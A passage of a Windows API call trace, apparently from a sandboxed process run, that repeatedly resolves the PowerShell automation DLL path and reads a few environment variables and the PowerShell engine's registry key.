GetLastError () returned 0xcb [0044.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.935] GetLastError () returned 0xcb [0044.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.936] GetLastError () returned 0xcb [0044.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.936] GetLastError () returned 0xcb [0044.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.937] GetLastError () returned 0xcb [0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.938] GetLastError () returned 0xcb [0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.938] GetLastError () returned 0xcb [0044.938] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0044.938] GetLastError () returned 0xcb [0044.938] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0044.938] GetLastError () returned 0xcb [0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.938] GetLastError () returned 0xcb [0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.938] GetLastError () returned 0xcb [0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.938] GetLastError () returned 0xcb [0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.938] GetLastError () returned 0xcb [0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.938] GetLastError () returned 0xcb [0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.938] GetLastError () returned 0xcb [0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.938] GetLastError () returned 0xcb [0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.938] GetLastError () returned 0xcb [0044.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.939] GetLastError () returned 0xcb [0044.939] GetCurrentProcessId () returned 0xa58 [0044.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.939] GetLastError () returned 0xcb [0044.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.939] GetLastError () returned 0xcb [0044.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.939] GetLastError () returned 0xcb [0044.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e078, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.939] GetLastError () returned 0xcb [0044.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e028, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.939] GetLastError () returned 0xcb [0044.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e028, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.939] GetLastError () returned 0xcb [0044.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e078, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.939] GetLastError () returned 0xcb [0044.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e028, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.939] GetLastError () returned 0xcb [0044.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e028, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.940] GetLastError () returned 0xcb [0044.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.940] GetLastError () returned 0xcb [0044.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.940] GetLastError () returned 0xcb [0044.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.940] GetLastError () returned 0xcb [0044.940] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e59c | out: phkResult=0x25e59c*=0x3a4) returned 0x0 [0044.940] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e5e4, lpData=0x0, lpcbData=0x25e5e0*=0x0 | out: lpType=0x25e5e4*=0x1, lpData=0x0, lpcbData=0x25e5e0*=0x56) returned 0x0 [0044.940] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e5e4, lpData=0x54e2a0, lpcbData=0x25e5e0*=0x56 | out: lpType=0x25e5e4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e5e0*=0x56) returned 0x0 [0044.940] RegCloseKey (hKey=0x3a4) returned 0x0 [0044.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.941] GetLastError () returned 0xcb [0044.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.941] GetLastError () returned 0xcb [0044.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.941] GetLastError () returned 0xcb [0044.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.941] GetLastError () returned 0xcb [0044.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.941] GetLastError () returned 0xcb [0044.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.941] GetLastError () returned 0xcb [0044.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.959] GetLastError () returned 0xcb [0044.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.959] GetLastError () returned 0xcb [0044.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.960] GetLastError () returned 0xcb [0044.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.960] GetLastError () returned 0xcb [0044.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.960] GetLastError () returned 0xcb [0044.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.960] GetLastError () returned 0xcb [0044.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.960] GetLastError () returned 0xcb [0044.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.960] GetLastError () returned 0xcb [0044.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.960] GetLastError () returned 0xcb [0044.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.960] GetLastError () returned 0xcb [0044.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.960] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.961] GetLastError () returned 0xcb [0044.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.962] GetLastError () returned 0xcb [0044.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.962] GetLastError () returned 0xcb [0044.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: 